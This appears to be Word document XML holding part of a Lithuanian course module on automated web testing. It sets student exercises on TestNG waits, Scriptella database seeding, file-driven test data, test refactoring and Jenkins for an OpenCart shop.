    <w:p w:rsidR="009D6E00" w:rsidRDefault="004B634E" w:rsidP="00372B3A">
      <w:pPr>
        <w:contextualSpacing/>
        <w:jc w:val="both"/>
      </w:pPr>
      <w:r w:rsidRPr="00AD4464">
        <w:t>UŽDUOTIES TIKSLAS</w:t>
      </w:r>
      <w:r w:rsidR="00111F14" w:rsidRPr="00AD4464">
        <w:t xml:space="preserve">: </w:t>
      </w:r>
      <w:r w:rsidR="00BD4AA8" w:rsidRPr="00AD4464">
        <w:rPr>
          <w:lang w:val="lt-LT"/>
        </w:rPr>
        <w:t>Išmokti kurti automatinius testus naudojant TestNG karkaso galimybes.</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="009D6E00" w:rsidRDefault="009D6E00" w:rsidP="00372B3A">
      <w:pPr>
        <w:contextualSpacing/>
        <w:jc w:val="both"/>
      </w:pPr>
    </w:p>
    <w:p w:rsidR="009D6E00" w:rsidRDefault="00626756"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bookmarkStart w:id="130" w:name="_Toc14392437"/>
      <w:r w:rsidRPr="00AD4464">
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman"/>
          <w:i w:val="0"/>
          <w:sz w:val="24"/>
          <w:lang w:val="lt-LT" w:eastAsia="lt-LT"/>
        </w:rPr>
        <w:t>Mokymosi rezultatas. Naudoti laukimo metodus.</w:t>
      </w:r>
      <w:bookmarkEnd w:id="130"/>
    </w:p>
    <w:p w:rsidR="009D6E00" w:rsidRDefault="009D6E00" w:rsidP="00372B3A">
      <w:pPr>
        <w:jc w:val="both"/>
        <w:rPr>
          <w:lang w:val="lt-LT" w:eastAsia="lt-LT"/>
        </w:rPr>
      </w:pPr>
    </w:p>
    <w:p w:rsidR="009D6E00" w:rsidRDefault="00980A07" w:rsidP="00372B3A">
      <w:pPr>
        <w:jc w:val="both"/>
        <w:rPr>
          <w:lang w:val="lt-LT"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="00AD4464">
        <w:rPr>
          <w:bCs/>
          <w:i/>
        </w:rPr>
        <w:t>1</w:t>
      </w:r>
      <w:r w:rsidR="00C72318" w:rsidRPr="00AD4464">
        <w:rPr>
          <w:bCs/>
        </w:rPr>
        <w:t xml:space="preserve"> </w:t>
      </w:r>
      <w:r w:rsidR="00C72318" w:rsidRPr="00AD4464">
        <w:rPr>
          <w:i/>
          <w:lang w:val="lt-LT"/>
        </w:rPr>
        <w:t xml:space="preserve">užduotis. </w:t>
      </w:r>
      <w:r w:rsidR="00A10615" w:rsidRPr="00AD4464">
        <w:rPr>
          <w:lang w:val="lt-LT"/>
        </w:rPr>
        <w:t>LAUKIMO METODŲ (ANG</w:t>
      </w:r>
      <w:r w:rsidR="00CC3845" w:rsidRPr="00AD4464">
        <w:rPr>
          <w:lang w:val="lt-LT"/>
        </w:rPr>
        <w:t>L</w:t>
      </w:r>
      <w:r w:rsidR="00A10615" w:rsidRPr="00AD4464">
        <w:rPr>
          <w:lang w:val="lt-LT"/>
        </w:rPr>
        <w:t>. WAIT) NAUDOJIMAS</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="009D6E00" w:rsidRDefault="00980A07" w:rsidP="00372B3A">
      <w:pPr>
        <w:contextualSpacing/>
        <w:jc w:val="both"/>
      </w:pPr>
      <w:r w:rsidRPr="00AD4464">
        <w:t>OpenCart žiniatinklio programai (kreipkitės į dėstytoją dėl konkrečios nuorodos) sukurkite testą, kuris patikrina, ar pagrindiniame puslapyje, banner dalyje atsiranda MacBook Air paveiksliukas. T</w:t>
      </w:r>
      <w:r w:rsidR="004B634E" w:rsidRPr="00AD4464">
        <w:t>am panaudokite laukimo funkciją</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="009D6E00" w:rsidRDefault="009D6E00" w:rsidP="00372B3A">
      <w:pPr>
        <w:jc w:val="both"/>
        <w:rPr>
          <w:lang w:val="lt-LT"/>
        </w:rPr>
      </w:pPr>
    </w:p>
    <w:p w:rsidR="009D6E00" w:rsidRDefault="004B634E" w:rsidP="00372B3A">
      <w:pPr>
        <w:contextualSpacing/>
        <w:jc w:val="both"/>
      </w:pPr>
      <w:r w:rsidRPr="00AD4464">
        <w:t>UŽDUOTIES TIKSLAS</w:t>
      </w:r>
      <w:r w:rsidR="00111F14" w:rsidRPr="00AD4464">
        <w:t xml:space="preserve">: </w:t>
      </w:r>
      <w:r w:rsidR="00BD4AA8" w:rsidRPr="00AD4464">
        <w:rPr>
          <w:lang w:val="lt-LT"/>
        </w:rPr>
        <w:t>Išmokti taikyti laukimo metodus (ang</w:t>
      </w:r>
      <w:r w:rsidR="00CC3845" w:rsidRPr="00AD4464">
        <w:rPr>
          <w:lang w:val="lt-LT"/>
        </w:rPr>
        <w:t>l</w:t>
      </w:r>
      <w:r w:rsidR="00BD4AA8" w:rsidRPr="00AD4464">
        <w:rPr>
          <w:lang w:val="lt-LT"/>
        </w:rPr>
        <w:t>. Waits) kūriant ir vykdant automatinius testus.</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="009D6E00" w:rsidRDefault="009D6E00" w:rsidP="00372B3A">
      <w:pPr>
        <w:jc w:val="both"/>
        <w:rPr>
          <w:lang w:val="lt-LT"/>
        </w:rPr>
      </w:pPr>
    </w:p>
    <w:p w:rsidR="009D6E00" w:rsidRDefault="00D67C4A"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bookmarkStart w:id="131" w:name="_Toc14392438"/>
      <w:r w:rsidRPr="00AD4464">
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman"/>
          <w:i w:val="0"/>
          <w:sz w:val="24"/>
          <w:lang w:val="lt-LT" w:eastAsia="lt-LT"/>
        </w:rPr>
        <w:t>Mokymosi rezultatas. Kurti išorinius duomenis naudojančius automatizuotus testus.</w:t>
      </w:r>
      <w:bookmarkEnd w:id="131"/>
    </w:p>
    <w:p w:rsidR="009D6E00" w:rsidRDefault="009D6E00" w:rsidP="00372B3A">
      <w:pPr>
        <w:ind w:left="720"/>
        <w:jc w:val="both"/>
        <w:rPr>
          <w:lang w:val="lt-LT"/>
        </w:rPr>
      </w:pPr>
    </w:p>
    <w:p w:rsidR="009D6E00" w:rsidRDefault="00107613" w:rsidP="00372B3A">
      <w:pPr>
        <w:jc w:val="both"/>
        <w:rPr>
          <w:lang w:val="lt-LT"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="00AD4464">
        <w:rPr>
          <w:bCs/>
          <w:i/>
        </w:rPr>
        <w:lastRenderedPageBreak/>
        <w:t>1</w:t>
      </w:r>
      <w:r w:rsidR="00C72318" w:rsidRPr="00AD4464">
        <w:rPr>
          <w:bCs/>
        </w:rPr>
        <w:t xml:space="preserve"> </w:t>
      </w:r>
      <w:r w:rsidR="00C72318" w:rsidRPr="00AD4464">
        <w:rPr>
          <w:i/>
          <w:lang w:val="lt-LT"/>
        </w:rPr>
        <w:t xml:space="preserve">užduotis. </w:t>
      </w:r>
      <w:r w:rsidR="00A10615" w:rsidRPr="00AD4464">
        <w:rPr>
          <w:lang w:val="lt-LT"/>
        </w:rPr>
        <w:t>PRADINIŲ DUOMENŲ ĮRAŠYMAS</w:t>
      </w:r>
      <w:r w:rsidR="00AD6C03">
        <w:rPr>
          <w:lang w:val="lt-LT"/>
        </w:rPr>
        <w:t>.</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="009D6E00" w:rsidRDefault="009D6E00" w:rsidP="00372B3A">
      <w:pPr>
        <w:contextualSpacing/>
        <w:jc w:val="both"/>
      </w:pPr>
    </w:p>
    <w:p w:rsidR="009D6E00" w:rsidRDefault="00107613" w:rsidP="00372B3A">
      <w:pPr>
        <w:contextualSpacing/>
        <w:jc w:val="both"/>
      </w:pPr>
      <w:r w:rsidRPr="00AD4464">
        <w:t>OpenCart žiniatinklio programai (kreipkitės į dėstytoją dėl konkrečios nuorodos) sukurkite testą, kuris:</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="009D6E00" w:rsidRDefault="00107613" w:rsidP="00372B3A">
      <w:pPr>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="8"/>
        </w:numPr>
        <w:contextualSpacing/>
        <w:jc w:val="both"/>
      </w:pPr>
      <w:r w:rsidRPr="00AD4464">
        <w:t>Į duomenų bazę įterpia įraša apie papildomą valiutą;</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="009D6E00" w:rsidRDefault="00107613" w:rsidP="00372B3A">
      <w:pPr>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="8"/>
        </w:numPr>
        <w:contextualSpacing/>
        <w:jc w:val="both"/>
      </w:pPr>
      <w:r w:rsidRPr="00AD4464">
        <w:t>Atidato OpenCart puslapį;</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="009D6E00" w:rsidRDefault="00107613" w:rsidP="00372B3A">
      <w:pPr>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="8"/>
        </w:numPr>
        <w:contextualSpacing/>
        <w:jc w:val="both"/>
      </w:pPr>
      <w:r w:rsidRPr="00AD4464">
        <w:t>Pakeičia valiutą;</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="009D6E00" w:rsidRDefault="00107613" w:rsidP="00372B3A">
      <w:pPr>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="8"/>
        </w:numPr>
        <w:contextualSpacing/>
        <w:jc w:val="both"/>
      </w:pPr>
      <w:r w:rsidRPr="00AD4464">
        <w:t>Patikrina, ar valiuta yra pakeista teisingai pasirinktoms dviems prekėms.</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="009D6E00" w:rsidRDefault="009D6E00" w:rsidP="00372B3A">
      <w:pPr>
        <w:contextualSpacing/>
        <w:jc w:val="both"/>
      </w:pPr>
    </w:p>
    <w:p w:rsidR="009D6E00" w:rsidRDefault="00107613" w:rsidP="00372B3A">
      <w:pPr>
        <w:contextualSpacing/>
        <w:jc w:val="both"/>
      </w:pPr>
      <w:r w:rsidRPr="00AD4464">
        <w:t>Įgyvendinimui pasin</w:t>
      </w:r>
      <w:r w:rsidR="004B634E" w:rsidRPr="00AD4464">
        <w:t>audokite scriptella galimybėmis</w:t>
      </w:r>
      <w:r w:rsidR="00AD6C03">
        <w:t>.</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="009D6E00" w:rsidRDefault="009D6E00" w:rsidP="00372B3A">
      <w:pPr>
        <w:contextualSpacing/>
        <w:jc w:val="both"/>
      </w:pPr>
    </w:p>
    <w:p w:rsidR="009D6E00" w:rsidRDefault="004B634E" w:rsidP="00372B3A">
      <w:pPr>
        <w:contextualSpacing/>
        <w:jc w:val="both"/>
        <w:rPr>
          <w:lang w:val="lt-LT"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="00AD4464">
        <w:t xml:space="preserve">UŽDUOTIES TIKSLAS: </w:t>
      </w:r>
      <w:r w:rsidR="00A76FBE" w:rsidRPr="00AD4464">
        <w:rPr>
          <w:lang w:val="lt-LT"/>
        </w:rPr>
        <w:t xml:space="preserve">Išmokti </w:t>
      </w:r>
      <w:r w:rsidR="00107613" w:rsidRPr="00AD4464">
        <w:rPr>
          <w:lang w:val="lt-LT"/>
        </w:rPr>
        <w:t>įraši</w:t>
      </w:r>
      <w:r w:rsidR="00A76FBE" w:rsidRPr="00AD4464">
        <w:rPr>
          <w:lang w:val="lt-LT"/>
        </w:rPr>
        <w:t>nėti pradinius duomenis į duomenų bazę naudojant Scriptella galimybes.</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="009D6E00" w:rsidRDefault="009D6E00" w:rsidP="00372B3A">
      <w:pPr>
        <w:contextualSpacing/>
        <w:jc w:val="both"/>
        <w:rPr>
          <w:lang w:val="lt-LT"/>
        </w:rPr>
      </w:pPr>
    </w:p>
    <w:p w:rsidR="009D6E00" w:rsidRDefault="00107613" w:rsidP="00372B3A">
      <w:pPr>
        <w:jc w:val="both"/>
        <w:rPr>
          <w:lang w:val="lt-LT"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="00AD4464">
        <w:rPr>
          <w:bCs/>
          <w:i/>
        </w:rPr>
        <w:t>2</w:t>
      </w:r>
      <w:r w:rsidR="00C72318" w:rsidRPr="00AD4464">
        <w:rPr>
          <w:bCs/>
        </w:rPr>
        <w:t xml:space="preserve"> </w:t>
      </w:r>
      <w:r w:rsidR="00C72318" w:rsidRPr="00AD4464">
        <w:rPr>
          <w:i/>
          <w:lang w:val="lt-LT"/>
        </w:rPr>
        <w:t xml:space="preserve">užduotis. </w:t>
      </w:r>
      <w:r w:rsidR="00A10615" w:rsidRPr="00AD4464">
        <w:rPr>
          <w:lang w:val="lt-LT"/>
        </w:rPr>
        <w:t>TESTINIŲ DUOMENŲ PARUOŠIMAS ĮVAIRIŲ FORMATŲ FAILUOSE</w:t>
      </w:r>
      <w:r w:rsidR="00AD6C03">
        <w:rPr>
          <w:lang w:val="lt-LT"/>
        </w:rPr>
        <w:t>.</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="009D6E00" w:rsidRDefault="009D6E00" w:rsidP="00372B3A">
      <w:pPr>
        <w:jc w:val="both"/>
      </w:pPr>
    </w:p>
    <w:p w:rsidR="009D6E00" w:rsidRDefault="00107613" w:rsidP="00372B3A">
      <w:pPr>
        <w:jc w:val="both"/>
        <w:rPr>
          <w:lang w:val="lt-LT"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="00AD4464">
        <w:t>OpenCart žiniatinklio programai (kreipkitės į dėstytoją dėl konkrečios nuorodos) sukurkite testą, kuris</w:t>
      </w:r>
      <w:r w:rsidR="004B634E" w:rsidRPr="00AD4464">
        <w:rPr>
          <w:lang w:val="lt-LT"/>
        </w:rPr>
        <w:t xml:space="preserve"> patikrina informaciją apie produktą:</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="009D6E00" w:rsidRDefault="004B634E" w:rsidP="00372B3A">
      <w:pPr>
        <w:jc w:val="both"/>
        <w:rPr>
          <w:lang w:val="lt-LT"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="00AD4464">
        <w:rPr>
          <w:lang w:val="lt-LT"/>
        </w:rPr>
        <w:t xml:space="preserve">1. </w:t>
      </w:r>
      <w:r w:rsidR="00107613" w:rsidRPr="00AD4464">
        <w:rPr>
          <w:lang w:val="lt-LT"/>
        </w:rPr>
        <w:t>Pavadinimą</w:t>
      </w:r>
      <w:r w:rsidRPr="00AD4464">
        <w:rPr>
          <w:lang w:val="lt-LT"/>
        </w:rPr>
        <w:t>;</w:t>
      </w:r>
      <w:r w:rsidR="00107613" w:rsidRPr="00AD4464">
        <w:rPr>
          <w:lang w:val="lt-LT"/>
        </w:rPr>
        <w:t xml:space="preserve"> </w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="009D6E00" w:rsidRDefault="004B634E" w:rsidP="00372B3A">
      <w:pPr>
        <w:jc w:val="both"/>
        <w:rPr>
          <w:lang w:val="lt-LT"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="00AD4464">
        <w:rPr>
          <w:lang w:val="lt-LT"/>
        </w:rPr>
        <w:t xml:space="preserve">2. </w:t>
      </w:r>
      <w:r w:rsidR="00107613" w:rsidRPr="00AD4464">
        <w:rPr>
          <w:lang w:val="lt-LT"/>
        </w:rPr>
        <w:t>Produkto kodą;</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="009D6E00" w:rsidRDefault="004B634E" w:rsidP="00372B3A">
      <w:pPr>
        <w:jc w:val="both"/>
        <w:rPr>
          <w:lang w:val="lt-LT"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="00AD4464">
        <w:rPr>
          <w:lang w:val="lt-LT"/>
        </w:rPr>
        <w:t>3. Vieneto kainą.</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="009D6E00" w:rsidRDefault="009D6E00" w:rsidP="00372B3A">
      <w:pPr>
        <w:jc w:val="both"/>
        <w:rPr>
          <w:lang w:val="lt-LT"/>
        </w:rPr>
      </w:pPr>
    </w:p>
    <w:p w:rsidR="009D6E00" w:rsidRDefault="00107613" w:rsidP="00372B3A">
      <w:pPr>
        <w:jc w:val="both"/>
        <w:rPr>
          <w:lang w:val="lt-LT"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="00AD4464">
        <w:rPr>
          <w:lang w:val="lt-LT"/>
        </w:rPr>
        <w:t>Duomenų palyginimui testas naud</w:t>
      </w:r>
      <w:r w:rsidR="004B634E" w:rsidRPr="00AD4464">
        <w:rPr>
          <w:lang w:val="lt-LT"/>
        </w:rPr>
        <w:t>oja išor</w:t>
      </w:r>
      <w:r w:rsidRPr="00AD4464">
        <w:rPr>
          <w:lang w:val="lt-LT"/>
        </w:rPr>
        <w:t>inį failą, iš kurio nuskaito informaciją apie produktą ir palygina puslapyje esančią informacija apie jį.</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="009D6E00" w:rsidRDefault="00710986" w:rsidP="00372B3A">
      <w:pPr>
        <w:contextualSpacing/>
        <w:jc w:val="both"/>
      </w:pPr>
      <w:r w:rsidRPr="00AD4464">
        <w:t>UŽDUOTIES TIKSLAS</w:t>
      </w:r>
      <w:r w:rsidR="00111F14" w:rsidRPr="00AD4464">
        <w:t xml:space="preserve">: </w:t>
      </w:r>
      <w:r w:rsidR="00A76FBE" w:rsidRPr="00AD4464">
        <w:rPr>
          <w:lang w:val="lt-LT"/>
        </w:rPr>
        <w:t>Išmokti kurti automatinius testus įgyvendinant pradinių duomenų nuskaitymą iš failų.</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="009D6E00" w:rsidRDefault="009D6E00" w:rsidP="00372B3A">
      <w:pPr>
        <w:jc w:val="both"/>
        <w:rPr>
          <w:lang w:val="lt-LT" w:eastAsia="lt-LT"/>
        </w:rPr>
      </w:pPr>
    </w:p>
    <w:p w:rsidR="009D6E00" w:rsidRDefault="00BE7EDB" w:rsidP="00372B3A">
      <w:pPr>
        <w:pStyle w:val="Heading2"/>
        <w:keepNext w:val="0"/>
        <w:numPr>
          <w:ilvl w:val="1"/>
          <w:numId w:val="32"/>
        </w:numPr>
        <w:spacing w:before="0" w:after="0"/>
        <w:ind w:left="0" w:firstLine="0"/>
        <w:contextualSpacing/>
        <w:jc w:val="both"/>
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman"/>
          <w:i w:val="0"/>
          <w:sz w:val="24"/>
          <w:szCs w:val="24"/>
          <w:lang w:val="lt-LT"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="00AD4464">
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman"/>
          <w:i w:val="0"/>
          <w:sz w:val="24"/>
          <w:szCs w:val="24"/>
          <w:lang w:val="lt-LT" w:eastAsia="lt-LT"/>
        </w:rPr>
        <w:t xml:space="preserve">Mokymosi rezultatas. </w:t>
      </w:r>
      <w:r w:rsidR="002356E8" w:rsidRPr="00AD4464">
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman"/>
          <w:i w:val="0"/>
          <w:sz w:val="24"/>
          <w:szCs w:val="24"/>
          <w:lang w:val="lt-LT"/>
        </w:rPr>
        <w:t>K</w:t>
      </w:r>
      <w:r w:rsidRPr="00AD4464">
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman"/>
          <w:i w:val="0"/>
          <w:sz w:val="24"/>
          <w:szCs w:val="24"/>
          <w:lang w:val="lt-LT"/>
        </w:rPr>
        <w:t>ur</w:t>
      </w:r>
      <w:r w:rsidR="002356E8" w:rsidRPr="00AD4464">
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman"/>
          <w:i w:val="0"/>
          <w:sz w:val="24"/>
          <w:szCs w:val="24"/>
          <w:lang w:val="lt-LT"/>
        </w:rPr>
        <w:t>ti automatizuotus</w:t>
      </w:r>
      <w:r w:rsidRPr="00AD4464">
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman"/>
          <w:i w:val="0"/>
          <w:sz w:val="24"/>
          <w:szCs w:val="24"/>
          <w:lang w:val="lt-LT"/>
        </w:rPr>
        <w:t xml:space="preserve"> testus </w:t>
      </w:r>
      <w:r w:rsidR="002356E8" w:rsidRPr="00AD4464">
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman"/>
          <w:i w:val="0"/>
          <w:sz w:val="24"/>
          <w:szCs w:val="24"/>
          <w:lang w:val="lt-LT"/>
        </w:rPr>
        <w:t>taikant gerąsias</w:t>
      </w:r>
      <w:r w:rsidRPr="00AD4464">
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman"/>
          <w:i w:val="0"/>
          <w:sz w:val="24"/>
          <w:szCs w:val="24"/>
          <w:lang w:val="lt-LT"/>
        </w:rPr>
        <w:t xml:space="preserve"> prakti</w:t>
      </w:r>
      <w:r w:rsidR="002356E8" w:rsidRPr="00AD4464">
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman"/>
          <w:i w:val="0"/>
          <w:sz w:val="24"/>
          <w:szCs w:val="24"/>
          <w:lang w:val="lt-LT"/>
        </w:rPr>
        <w:t>kas.</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="009D6E00" w:rsidRDefault="009D6E00" w:rsidP="00372B3A">
      <w:pPr>
        <w:jc w:val="both"/>
        <w:rPr>
          <w:lang w:val="lt-LT" w:eastAsia="lt-LT"/>
        </w:rPr>
      </w:pPr>
    </w:p>
    <w:p w:rsidR="009D6E00" w:rsidRDefault="002356E8" w:rsidP="00372B3A">
      <w:pPr>
        <w:jc w:val="both"/>
        <w:rPr>
          <w:lang w:val="lt-LT"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="00AD4464">
        <w:rPr>
          <w:bCs/>
          <w:i/>
        </w:rPr>
        <w:t>1</w:t>
      </w:r>
      <w:r w:rsidR="00697283" w:rsidRPr="00AD4464">
        <w:rPr>
          <w:bCs/>
          <w:i/>
        </w:rPr>
        <w:t xml:space="preserve"> </w:t>
      </w:r>
      <w:r w:rsidR="00C72318" w:rsidRPr="00AD4464">
        <w:rPr>
          <w:i/>
          <w:lang w:val="lt-LT"/>
        </w:rPr>
        <w:t xml:space="preserve">užduotis. </w:t>
      </w:r>
      <w:r w:rsidR="00A10615" w:rsidRPr="00AD4464">
        <w:rPr>
          <w:lang w:val="lt-LT"/>
        </w:rPr>
        <w:t>GEROSIOS PRAKTIKOS</w:t>
      </w:r>
      <w:r w:rsidR="00AD6C03">
        <w:rPr>
          <w:lang w:val="lt-LT"/>
        </w:rPr>
        <w:t>.</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="009D6E00" w:rsidRDefault="009D6E00" w:rsidP="00372B3A">
      <w:pPr>
        <w:contextualSpacing/>
        <w:jc w:val="both"/>
      </w:pPr>
    </w:p>
    <w:p w:rsidR="009D6E00" w:rsidRDefault="00107613" w:rsidP="00372B3A">
      <w:pPr>
        <w:contextualSpacing/>
        <w:jc w:val="both"/>
      </w:pPr>
      <w:r w:rsidRPr="00AD4464">
        <w:t xml:space="preserve">Pasirinkite jau turimus testus, bei </w:t>
      </w:r>
      <w:r w:rsidR="00CE75FB" w:rsidRPr="00AD4464">
        <w:t>sukurkite juos pagal rekom</w:t>
      </w:r>
      <w:r w:rsidRPr="00AD4464">
        <w:t>enduojamas gerąsias praktikas. T.y. sukurkite klases, pabandykite perrašyti metodus taip, kad jie atliktų tik vieną (pagrindinę) funkciją, atsikratykite pasikartojančio kodo, panaudokite rekom</w:t>
      </w:r>
      <w:r w:rsidR="00710986" w:rsidRPr="00AD4464">
        <w:t>enduojamą pavadinimų konvensiją</w:t>
      </w:r>
      <w:r w:rsidR="00AD6C03">
        <w:t>.</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="009D6E00" w:rsidRDefault="009D6E00" w:rsidP="00372B3A">
      <w:pPr>
        <w:jc w:val="both"/>
        <w:rPr>
          <w:lang w:val="lt-LT"/>
        </w:rPr>
      </w:pPr>
    </w:p>
    <w:p w:rsidR="009D6E00" w:rsidRDefault="00710986" w:rsidP="00372B3A">
      <w:pPr>
        <w:contextualSpacing/>
        <w:jc w:val="both"/>
        <w:rPr>
          <w:lang w:val="lt-LT"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="00AD4464">
        <w:t>UŽDUOTIES TIKSLAS</w:t>
      </w:r>
      <w:r w:rsidR="00111F14" w:rsidRPr="00AD4464">
        <w:t xml:space="preserve">: </w:t>
      </w:r>
      <w:r w:rsidR="001A40CC" w:rsidRPr="00AD4464">
        <w:rPr>
          <w:lang w:val="lt-LT"/>
        </w:rPr>
        <w:t>Išmokti kur</w:t>
      </w:r>
      <w:r w:rsidR="00BE7EDB" w:rsidRPr="00AD4464">
        <w:rPr>
          <w:lang w:val="lt-LT"/>
        </w:rPr>
        <w:t>ti automatinius testus remianti</w:t>
      </w:r>
      <w:r w:rsidR="001A40CC" w:rsidRPr="00AD4464">
        <w:rPr>
          <w:lang w:val="lt-LT"/>
        </w:rPr>
        <w:t>s gerosiomis prakti</w:t>
      </w:r>
      <w:r w:rsidR="00BE7EDB" w:rsidRPr="00AD4464">
        <w:rPr>
          <w:lang w:val="lt-LT"/>
        </w:rPr>
        <w:t>komis. Išmokti taikyti klasių a</w:t>
      </w:r>
      <w:r w:rsidR="001A40CC" w:rsidRPr="00AD4464">
        <w:rPr>
          <w:lang w:val="lt-LT"/>
        </w:rPr>
        <w:t>bstrakcijas ir pavadinimų konvenciją (angl. naming convention)</w:t>
      </w:r>
      <w:r w:rsidR="00AD6C03">
        <w:rPr>
          <w:lang w:val="lt-LT"/>
        </w:rPr>
        <w:t>.</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="009D6E00" w:rsidRDefault="009D6E00" w:rsidP="00372B3A">
      <w:pPr>
        <w:contextualSpacing/>
        <w:jc w:val="both"/>
      </w:pPr>
    </w:p>
    <w:p w:rsidR="009D6E00" w:rsidRDefault="002356E8" w:rsidP="00372B3A">
      <w:pPr>
        <w:contextualSpacing/>
        <w:jc w:val="both"/>
        <w:rPr>
          <w:b/>
          <w:lang w:val="lt-LT" w:eastAsia="lt-LT"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="00AD4464">
        <w:rPr>
          <w:b/>
          <w:lang w:val="lt-LT" w:eastAsia="lt-LT"/>
        </w:rPr>
        <w:t xml:space="preserve">2.7. </w:t>
      </w:r>
      <w:bookmarkStart w:id="132" w:name="_Toc14392440"/>
      <w:r w:rsidR="008D6926" w:rsidRPr="00AD4464">
        <w:rPr>
          <w:b/>
          <w:lang w:val="lt-LT" w:eastAsia="lt-LT"/>
        </w:rPr>
        <w:t xml:space="preserve"> </w:t>
      </w:r>
      <w:r w:rsidR="00D67C4A" w:rsidRPr="00AD4464">
        <w:rPr>
          <w:b/>
          <w:lang w:val="lt-LT" w:eastAsia="lt-LT"/>
        </w:rPr>
        <w:t>Mokymosi rezultatas</w:t>
      </w:r>
      <w:r w:rsidR="00D67C4A" w:rsidRPr="00AD4464">
        <w:rPr>
          <w:i/>
          <w:lang w:val="lt-LT" w:eastAsia="lt-LT"/>
        </w:rPr>
        <w:t xml:space="preserve">. </w:t>
      </w:r>
      <w:r w:rsidR="00626756" w:rsidRPr="00AD4464">
        <w:rPr>
          <w:b/>
          <w:lang w:val="lt-LT" w:eastAsia="lt-LT"/>
        </w:rPr>
        <w:t>Naudoti nuolatinės integracijos tarnybinę stotį automatinių testų vykdymui ir stebėjimui.</w:t>
      </w:r>
      <w:bookmarkEnd w:id="132"/>
    </w:p>
    <w:p w:rsidR="009D6E00" w:rsidRDefault="009D6E00" w:rsidP="00372B3A">
      <w:pPr>
        <w:jc w:val="both"/>
        <w:rPr>
          <w:lang w:val="lt-LT" w:eastAsia="lt-LT"/>
        </w:rPr>
      </w:pPr>
    </w:p>
    <w:p w:rsidR="009D6E00" w:rsidRDefault="00697283" w:rsidP="00372B3A">
      <w:pPr>
        <w:jc w:val="both"/>
        <w:rPr>
          <w:lang w:val="lt-LT"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="00AD4464">
        <w:rPr>
          <w:bCs/>
          <w:i/>
        </w:rPr>
        <w:t>1</w:t>
      </w:r>
      <w:r w:rsidR="00C72318" w:rsidRPr="00AD4464">
        <w:rPr>
          <w:bCs/>
        </w:rPr>
        <w:t xml:space="preserve"> </w:t>
      </w:r>
      <w:r w:rsidR="00C72318" w:rsidRPr="00AD4464">
        <w:rPr>
          <w:i/>
          <w:lang w:val="lt-LT"/>
        </w:rPr>
        <w:t>užduotis.</w:t>
      </w:r>
      <w:r w:rsidR="00C72318" w:rsidRPr="00AD4464">
        <w:rPr>
          <w:lang w:val="lt-LT"/>
        </w:rPr>
        <w:t xml:space="preserve"> </w:t>
      </w:r>
      <w:r w:rsidR="00A10615" w:rsidRPr="00AD4464">
        <w:rPr>
          <w:lang w:val="lt-LT"/>
        </w:rPr>
        <w:t>TESTŲ AUTOMATINIS PALEIDIMAS JENKINS SISTEMOJE</w:t>
      </w:r>
      <w:r w:rsidR="00AD6C03">
        <w:rPr>
          <w:lang w:val="lt-LT"/>
        </w:rPr>
        <w:t>.</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="009D6E00" w:rsidRDefault="009D6E00" w:rsidP="00372B3A">
      <w:pPr>
        <w:contextualSpacing/>
        <w:jc w:val="both"/>
      </w:pPr>
    </w:p>
